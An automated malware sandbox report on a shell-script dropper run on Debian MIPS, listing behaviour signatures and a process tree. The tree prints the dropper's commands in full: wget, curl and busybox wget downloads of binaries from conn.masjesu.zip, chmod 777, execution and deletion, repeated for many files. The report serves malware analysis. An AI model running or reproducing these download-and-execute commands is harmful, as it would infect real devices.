a57f78048480b2ed7ff7a37451d4897e1074ba581702c0f3bb7091f5bd36e18d

Analysis

max time kernel
135s
max time network
138s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
20/11/2024, 03:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a57f78048480b2ed7ff7a37451d4897e1074ba581702c0f3bb7091f5bd36e18d.sh
Size

10KB
MD5

d04aef248591605fcb07881eb34a7ee8
SHA1

00db4a6a28c09e0d2258ce80f1d24a98f2305554
SHA256

a57f78048480b2ed7ff7a37451d4897e1074ba581702c0f3bb7091f5bd36e18d
SHA512

4517b801ca44fad07da608b7f0390d83677797ae5dd9f5018d0170ee387444cba428e39232bf3a88e18cd27eca179f4da8ad546dfcef77ab043128ad5b29636d
SSDEEP

192:OXf8tx3xpziqlAsJNyEbW8oXf8txFLiqlAsXH:OXf8tx3xp/csWjXf8txFx

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
882	chmod
924	chmod
959	chmod
966	chmod
751	chmod
777	chmod
917	chmod
834	chmod
875	chmod
896	chmod
980	chmod
903	chmod
931	chmod
945	chmod
952	chmod
973	chmod
737	chmod
817	chmod
1001	chmod
889	chmod
938	chmod
987	chmod
805	chmod
859	chmod
910	chmod
744	chmod
868	chmod
994	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
783	wget
984	curl
990	wget
774	busybox
930	busybox
944	busybox
977	curl
979	busybox
856	busybox
899	wget
921	curl
949	curl
726	curl
881	busybox
886	curl
914	curl
969	wget
829	busybox
874	busybox
878	wget
879	curl
741	curl
743	busybox
787	curl
865	curl
872	curl
928	curl
935	curl
948	wget
955	wget
958	busybox
998	curl
750	busybox
816	busybox
820	wget
893	curl
916	busybox
937	busybox
962	wget
710	wget
814	curl
839	wget
902	busybox
934	wget
941	wget
976	wget
747	wget
748	curl
767	curl
811	wget
927	wget
963	curl
986	busybox
991	curl
821	curl
864	wget
892	wget
907	curl
923	busybox
740	wget
888	busybox
906	wget
867	busybox
920	wget

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ	curl
File opened for modification	/tmp/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7	curl
File opened for modification	/tmp/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO	curl
File opened for modification	/tmp/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN	curl
File opened for modification	/tmp/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r	curl
File opened for modification	/tmp/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN	curl
File opened for modification	/tmp/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z	curl
File opened for modification	/tmp/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp	curl
File opened for modification	/tmp/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp	curl
File opened for modification	/tmp/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7	curl
File opened for modification	/tmp/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV	curl
File opened for modification	/tmp/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf	curl
File opened for modification	/tmp/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z	curl
File opened for modification	/tmp/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1	curl
File opened for modification	/tmp/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z	curl
File opened for modification	/tmp/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu	curl
File opened for modification	/tmp/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ	curl
File opened for modification	/tmp/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf	curl
File opened for modification	/tmp/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat	curl
File opened for modification	/tmp/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu	curl
File opened for modification	/tmp/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat	curl
File opened for modification	/tmp/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj	curl
File opened for modification	/tmp/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO	curl
File opened for modification	/tmp/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z	curl
File opened for modification	/tmp/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r	curl
File opened for modification	/tmp/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1	curl
File opened for modification	/tmp/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV	curl
File opened for modification	/tmp/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj	curl

/tmp/a57f78048480b2ed7ff7a37451d4897e1074ba581702c0f3bb7091f5bd36e18d.sh
/tmp/a57f78048480b2ed7ff7a37451d4897e1074ba581702c0f3bb7091f5bd36e18d.sh
1⤵
PID:703
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:707
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  - System Network Configuration Discovery
  PID:710
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:726
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  PID:736
- /bin/chmod
  chmod 777 lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  - File and Directory Permissions Modification
  PID:737
- /tmp/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  ./lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  - Executes dropped EXE
  PID:738
- /bin/rm
  rm lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  PID:739
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  - System Network Configuration Discovery
  PID:740
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:741
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  - System Network Configuration Discovery
  PID:743
- /bin/chmod
  chmod 777 AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  ./AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  - Executes dropped EXE
  PID:745
- /bin/rm
  rm AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  PID:746
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  - System Network Configuration Discovery
  PID:747
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:748
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  - System Network Configuration Discovery
  PID:750
- /bin/chmod
  chmod 777 KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  - File and Directory Permissions Modification
  PID:751
- /tmp/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  ./KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  - Executes dropped EXE
  PID:753
- /bin/rm
  rm KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  PID:756
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  PID:758
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:767
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  - System Network Configuration Discovery
  PID:774
- /bin/chmod
  chmod 777 MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  - File and Directory Permissions Modification
  PID:777
- /tmp/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  ./MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  - Executes dropped EXE
  PID:779
- /bin/rm
  rm MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  PID:782
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  - System Network Configuration Discovery
  PID:783
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:787
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  PID:797
- /bin/chmod
  chmod 777 DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  - File and Directory Permissions Modification
  PID:805
- /tmp/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  ./DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  - Executes dropped EXE
  PID:806
- /bin/rm
  rm DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  PID:810
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  - System Network Configuration Discovery
  PID:811
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:814
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  - System Network Configuration Discovery
  PID:816
- /bin/chmod
  chmod 777 gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  - File and Directory Permissions Modification
  PID:817
- /tmp/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  ./gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  - Executes dropped EXE
  PID:818
- /bin/rm
  rm gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  PID:819
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  - System Network Configuration Discovery
  PID:820
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:821
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  - System Network Configuration Discovery
  PID:829
- /bin/chmod
  chmod 777 Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  - File and Directory Permissions Modification
  PID:834
- /tmp/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  ./Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  - Executes dropped EXE
  PID:835
- /bin/rm
  rm Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  PID:838
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  - System Network Configuration Discovery
  PID:839
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:848
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  - System Network Configuration Discovery
  PID:856
- /bin/chmod
  chmod 777 lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  - File and Directory Permissions Modification
  PID:859
- /tmp/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  ./lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  - Executes dropped EXE
  PID:860
- /bin/rm
  rm lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  PID:862
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  - System Network Configuration Discovery
  PID:864
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:865
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  - System Network Configuration Discovery
  PID:867
- /bin/chmod
  chmod 777 iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  - File and Directory Permissions Modification
  PID:868
- /tmp/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  ./iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  - Executes dropped EXE
  PID:869
- /bin/rm
  rm iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  PID:870
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  PID:871
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:872
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  - System Network Configuration Discovery
  PID:874
- /bin/chmod
  chmod 777 iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  - File and Directory Permissions Modification
  PID:875
- /tmp/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  ./iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  - Executes dropped EXE
  PID:876
- /bin/rm
  rm iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  PID:877
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  - System Network Configuration Discovery
  PID:878
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:879
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  - System Network Configuration Discovery
  PID:881
- /bin/chmod
  chmod 777 oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  - File and Directory Permissions Modification
  PID:882
- /tmp/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  ./oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  - Executes dropped EXE
  PID:883
- /bin/rm
  rm oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  PID:884
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  PID:885
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:886
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  - System Network Configuration Discovery
  PID:888
- /bin/chmod
  chmod 777 gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  - File and Directory Permissions Modification
  PID:889
- /tmp/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  ./gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  - Executes dropped EXE
  PID:890
- /bin/rm
  rm gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  PID:891
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  - System Network Configuration Discovery
  PID:892
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:893
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  PID:895
- /bin/chmod
  chmod 777 h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  - File and Directory Permissions Modification
  PID:896
- /tmp/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  ./h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  - Executes dropped EXE
  PID:897
- /bin/rm
  rm h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  PID:898
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  - System Network Configuration Discovery
  PID:899
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:900
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  - System Network Configuration Discovery
  PID:902
- /bin/chmod
  chmod 777 gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  - File and Directory Permissions Modification
  PID:903
- /tmp/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  ./gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  - Executes dropped EXE
  PID:904
- /bin/rm
  rm gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  PID:905
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  - System Network Configuration Discovery
  PID:906
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:907
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  PID:909
- /bin/chmod
  chmod 777 oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  - File and Directory Permissions Modification
  PID:910
- /tmp/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  ./oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  - Executes dropped EXE
  PID:911
- /bin/rm
  rm oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  PID:912
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  PID:913
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:914
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  - System Network Configuration Discovery
  PID:916
- /bin/chmod
  chmod 777 gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  - File and Directory Permissions Modification
  PID:917
- /tmp/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  ./gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  - Executes dropped EXE
  PID:918
- /bin/rm
  rm gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  PID:919
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  - System Network Configuration Discovery
  PID:920
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:921
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  - System Network Configuration Discovery
  PID:923
- /bin/chmod
  chmod 777 h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  - File and Directory Permissions Modification
  PID:924
- /tmp/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  ./h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  - Executes dropped EXE
  PID:925
- /bin/rm
  rm h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  PID:926
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  - System Network Configuration Discovery
  PID:927
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:928
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  - System Network Configuration Discovery
  PID:930
- /bin/chmod
  chmod 777 gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  - File and Directory Permissions Modification
  PID:931
- /tmp/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  ./gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  - Executes dropped EXE
  PID:932
- /bin/rm
  rm gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  PID:933
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  - System Network Configuration Discovery
  PID:934
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:935
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  - System Network Configuration Discovery
  PID:937
- /bin/chmod
  chmod 777 lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  - File and Directory Permissions Modification
  PID:938
- /tmp/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  ./lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  - Executes dropped EXE
  PID:939
- /bin/rm
  rm lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  PID:940
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  - System Network Configuration Discovery
  PID:941
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:942
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  - System Network Configuration Discovery
  PID:944
- /bin/chmod
  chmod 777 AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  - File and Directory Permissions Modification
  PID:945
- /tmp/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  ./AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  - Executes dropped EXE
  PID:946
- /bin/rm
  rm AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  PID:947
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  - System Network Configuration Discovery
  PID:948
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:949
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  PID:951
- /bin/chmod
  chmod 777 KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  - File and Directory Permissions Modification
  PID:952
- /tmp/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  ./KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  - Executes dropped EXE
  PID:953
- /bin/rm
  rm KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  PID:954
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  - System Network Configuration Discovery
  PID:955
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:956
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  - System Network Configuration Discovery
  PID:958
- /bin/chmod
  chmod 777 MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  - File and Directory Permissions Modification
  PID:959
